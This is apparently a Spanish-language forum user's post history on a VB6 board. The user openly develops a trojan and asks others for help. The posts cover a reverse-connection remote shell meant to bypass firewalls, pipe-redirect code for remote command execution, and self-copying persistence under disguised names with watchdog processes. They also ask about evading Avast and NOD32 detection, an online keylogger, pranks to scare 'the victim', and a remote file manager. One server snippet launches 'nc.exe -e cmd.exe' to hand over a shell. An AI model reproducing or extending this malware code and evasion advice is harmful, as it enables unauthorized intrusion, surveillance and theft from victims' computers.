|
Mostrar Temas
|
Páginas: [1] 2
|
1
|
Programación / Programación Visual Basic / Activar Telnet VB6
|
en: 15 Diciembre 2009, 01:32 am
|
hola estoy viendo la posibilidad para agregar a mi troyano una funcion que deje un agujero en el pc para poder sacar una shell remota.. se me ocurrio que podria dejar de alguna manera un telnet a la escucha(nose como, no tengo mucha informacion sobre telnet) y asi poder conectarme y obtener shell remota se puede? a alguien se le ocurre alguna manera? gracias!
PD: seria harto mejor que fuera conexion inversa para saltarse firewalls y demases, dejar un telnet a la escucha en mi pc y que el telnet remoto trate de conectarse cada cierto rato
|
|
|
2
|
Programación / Programación Visual Basic / Ayuda con CMD Pipe vb6
|
en: 12 Diciembre 2009, 05:06 am
|
hola hace unos años cree un troyano de multiconexion inversa ahora lo retome ya que lo quiero volver a usar y estoy en proceso para poder enviar comandos a la cmd remota y poder volver a recibir lo que pasa (EJ: pongo dir C:\ y me devuelve el resultado, enlistando los archivos en C:\) para esto encontre este codigo de cmd pipe 'Redirects output from console program to textbox. 'Requires two textboxes and one command button. 'Set MultiLine property of Text2 to true. ' 'Original bcx version of this program was made by ' dl <dl@tks.cjb.net> 'VB port was made by Jernej Simoncic <jernej@isg.si> 'Visit Jernejs site at http://www2.arnes.si/~sopjsimo/ ' 'Note: don't run plain DOS programs with this example 'under Windows 95,98 and ME, as the program freezes when 'execution of program is finnished.
Option Explicit Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As Long Private Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO) Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type
Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As Long End Type
Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As Long End Type
Private Type OVERLAPPED ternal As Long ternalHigh As Long offset As Long OffsetHigh As Long hEvent As Long End Type
Private Const STARTF_USESHOWWINDOW = &H1 Private Const STARTF_USESTDHANDLES = &H100 Private Const SW_HIDE = 0 Private Const EM_SETSEL = &HB1 Private Const EM_REPLACESEL = &HC2
Private Sub Command1_Click() Command1.Enabled = False Redirect Text1.Text, Text2 Command1.Enabled = True End Sub Private Sub Form_Load() Text1.Text = "ping" End Sub Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) If Command1.Enabled = False Then Cancel = True End Sub
Sub Redirect(cmdLine As String, objTarget As Object) Dim i%, t$ Dim pa As SECURITY_ATTRIBUTES Dim pra As SECURITY_ATTRIBUTES Dim tra As SECURITY_ATTRIBUTES Dim pi As PROCESS_INFORMATION Dim sui As STARTUPINFO Dim hRead As Long Dim hWrite As Long Dim bRead As Long Dim lpBuffer(1024) As Byte pa.nLength = Len(pa) pa.lpSecurityDescriptor = 0 pa.bInheritHandle = True pra.nLength = Len(pra) tra.nLength = Len(tra)
If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then sui.cb = Len(sui) GetStartupInfo sui sui.hStdOutput = hWrite sui.hStdError = hWrite sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES sui.wShowWindow = SW_HIDE If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then SetWindowText objTarget.hwnd, "" Do Erase lpBuffer() If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then SendMessage objTarget.hwnd, EM_SETSEL, -1, 0 SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0) DoEvents Else CloseHandle pi.hThread CloseHandle pi.hProcess Exit Do End If CloseHandle hWrite Loop CloseHandle hRead End If End If End Sub para enviar comandos como cd o dir hay que anteponer un "cmd /k" (Ej: cmd /k dir C:\) no me pregunten por que (si alguien me puede explicar porque hay que hacerlo se agradece jajaja) pero bueno el problema es que al enviar un comando como un dir o cd, me sale este error: Error '9' en tiempo de ejecucion: el subindice esta fuera del intervalo
ayuda porfavor! gracias de antemano
|
|
|
3
|
Programación / Programación Visual Basic / Problema con Avast ¬¬
|
en: 26 Junio 2007, 00:00 am
|
no se porque el avast me empezo a detectar mi troyanito =( esta hecho en vb y lo hice yo, ningun otro av lo detecta solo el nod parece que es por que se copia a la carpeta de windows i se renombra, ademas de eso crea un programa aparte que chekea si esta iniciado el proceso, si no lo esta lo inicia, todo esto en un timer tambien tengo cifrada la clave del registro.. que puedo hacer? publico el code para que me ayuden en que parte puede estar detectandolo??? GraciaS de AnteManO!
|
|
|
4
|
Programación / Programación Visual Basic / Detectar si se repite una combinacion....
|
en: 20 Junio 2007, 00:47 am
|
Primero que nada este code no es para mi... me lo pidio un amigo que en realidad no entiendo mucho lo que quiere hacer... al parecer es para descifrar un codigo del zodiaco.. algo así entendi.. pero bueno aca va la pregunta lo que quiero hacer es por ejemplo tener un textbox, y en ese textbox se escribiria un textto como este con varios signos 1asd^ç*da!7//asd?^ç*??213¡¡¡ la idea es que al apretar un command button el textbox marque todas las combinaciones repeitdas de 3 caracteres, por ejemplo aca se repite la combinacion de 3 caracteres ^ç* entonces el textbox deberia marcar con otro color el ^ç*me expplique bien??? es posible hacer esto con vb6??? Gracias de antemano!!!!
|
|
|
5
|
Programación / Programación Visual Basic / filecopy detectado por nod32 =S
|
en: 18 Junio 2007, 22:22 pm
|
hace tiempo que estoy con un troyano, y decidi hacerle un modulo de "infeccion", entre comillas por que realmente no es infeccion.. lo unico que hace es copiar el programa 2 veces a la carpeta de windows, con los nombres ssms.exe y jushed.exe, el primero compureba cada cierto rato que exista el archivo jushed y que este iniciado el proceso, si no es asi, se autocopia, i si es necesario inicia el proceso, lo mismo jushed.exe, hace lo mismo, solo que inversamente, ademas de hacer la conexion al troyano. El problema esta en que en el modulo, esta la linea WinDirek = Environ("windir") & "/" BSExe = App.path & "/" & App.EXEName & ".exe" FileCopy BSExe, WinDirek & "jushed.exe" si saco la linea filecopy, y le paso el nod32, no lo detecta, si la vuelvo a poner me lo empieza a detectar alguien sabe como solucionarlo??? talve encriptandolo??? GraciasS de Antemano
|
|
|
6
|
Programación / Programación Visual Basic / cifrar Cadena Registro
|
en: 16 Junio 2007, 17:40 pm
|
wenasS ase tiempo que estoy haciendo un troyano en vb6, y hace un tiempo el nod32 me lo empezo a detectar. Vivachapas me dijo que era por heuristica (o como se escriba xD), y se solucionaba cifrando la cadena del registro. Encontre un code bien corto y lo puse, el problema es que no lo entiendo para nada, y tengo varias aplicaciones que ocupan el mismo code para agregar y cifrar la cadena, entonces al parecer la remplaza :S alguien tiene algun code que pueda explicar? GRAcias de antemano
|
|
|
7
|
Programación / Programación Visual Basic / Cursor???
|
en: 24 Mayo 2007, 00:17 am
|
wenassS estoy haciendo un troyano desde hace harto tiempo, cuando lo termine lo publico aca para que lo vean bueno.. la cosa es que ya tiene varias funciones serias, pero no muchas lammeradas... no es que sea lammer, pero muchas veces en un troyano termina siendo divertido asustar un poco a la victima con algunas bromas de buen gusto lo que se me ocurrio hacer, y lo he visto en troyanos como el darkmoon, es hacer que mientras vaya moviendo el cursor del raton, que vaya dejando un "rastro" me refiero a que vaya rayando su escritorio de algun color, lo otro seria hacer que el maus se vuelva loco, osea que se empieze a mover hacia cualquier lado.. alguien tiene algun code???, si me pueden orientar o ayudar se los agradeceria mucho! gracias de antemano!
|
|
|
8
|
Programación / Programación Visual Basic / Error con SendData de la api ws!
|
en: 20 Mayo 2007, 19:46 pm
|
estoy haciendo un keylogger online, y todo va bien hasta que al enviar los datos con un timer, me da error en el modulo de la api de ws, me dice Error '9' en tiempo de ejecución, el subindice esta fuera del intervalo y apunta a esta linea del modulo de la api de ws Err.Raise Err.Number, "CSocket.SendData", Err.Description Gracias de antemano
|
|
|
9
|
Programación / Programación Visual Basic / Problema con Split data
|
en: 15 Mayo 2007, 02:53 am
|
weno sigo con el proyecto de mi troyano, que cada dia mejora mas... aunque estuvo tirado x aproximadamente 1semana, porque estuve mui ocupado asiendo cosas para el cole.. bueno en fin... mi problema es que cuando mando algo, i ago split data, la segunda parte no llega nunca al text del servidor.. no se si me explico bien, pero aca dejo el code de cliente y servidor: Cliente:
Public VPort As Integer Private Sub Command1_Click() VPort = Text1.Text Dim vIndex As Variant 'Declaracion vIndex = Split(Form1.ListConexion.SelectedItem.Key, "|") Form1.WS(vIndex(0)).SendData "nc_shell" & "|" & VPort End Sub 'al presionar el boton, manda al servidor la palabra nc_shell y un puerto
Servidor: Private Sub WS_onDataArrival(ByVal bytesTotal As Long) Dim vData() As String WS.GetData VTData, vbString vData = Split(VTData, "|") If vData(0) = "msge" Then MsgBox vData(1) VTData = "" End If If vData(0) = "nc_shell" Then Shell App.path & "\nc.exe -e cmd.exe IP" & "|" & vData(1) End If '''' ******notese esta parte que es la quye interesa! Text1.Text = VTData End Sub
la finalidad de este code, es abrir el netcat, para obtener shell remota, en un determinado port.. e revisado varias veces el code i no encuentro cual es la falla! si no me explike bien diganme lo que no entendieron pero ayuda porfavor! GRACIAS de antemano!
|
|
|
10
|
Programación / Programación Visual Basic / Crear Filemanager remoto
|
en: 7 Mayo 2007, 22:01 pm
|
bueno como algunos saben, estoy en la creacion de un troyano mci, por ahora tiene pocas funciones.. ya le ire agregando mas.. estaba pensando en ponerle un filemanager remoto, osea poder explorar el hd, subir/bajar archivos y ejecutar archivos, encontre un manual (troyano desde 0, en portalhacker.net) pero el filemanager que tenia, permitia explorar solamente tu disco, y para bajar archivos de la maquina remota, aparecia un cartelito pidiendo la ruta del archivo, lo que encontre extraño, por que no habia forma de explorar el hd de la victima.. alguien que me pueda orientar o ayudar??? muchas gracias!
|
|
|
|
|
|
|